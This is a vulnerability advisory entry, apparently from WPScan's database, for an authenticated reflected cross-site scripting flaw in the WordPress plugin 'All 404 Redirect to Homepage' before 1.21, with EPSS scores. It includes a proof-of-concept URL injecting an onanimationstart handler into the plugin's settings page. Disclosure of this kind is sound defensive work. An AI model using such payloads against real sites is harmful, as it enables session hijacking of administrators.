Lucene search

K
wpvulndbWpvulndbWPVDB-ID:63D6CA03-E0DF-40DB-9839-531C13619094
HistoryApr 16, 2021 - 12:00 a.m.

All 404 Redirect to Homepage < 1.21 - Authenticated Reflected Cross-Site Scripting (XSS)

2021-04-1600:00:00
wpscan.com
15

0.001 Low

EPSS

Percentile

24.8%

The tab parameter of the settings page of the plugin was vulnerable to an authenticated reflected Cross-Site Scripting (XSS) issue as user input was not properly sanitised before being output in an attribute.

PoC

https://example.com/wp-admin/options-general.php?page=all-404-redirect-to-homepage&amp;tab;=on"style%3D"animation-name%3Arotation"+onanimationstart%3D"alert(origin)">

CPENameOperatorVersion
all-404-redirect-to-homepagelt1.21

0.001 Low

EPSS

Percentile

24.8%

Related for WPVDB-ID:63D6CA03-E0DF-40DB-9839-531C13619094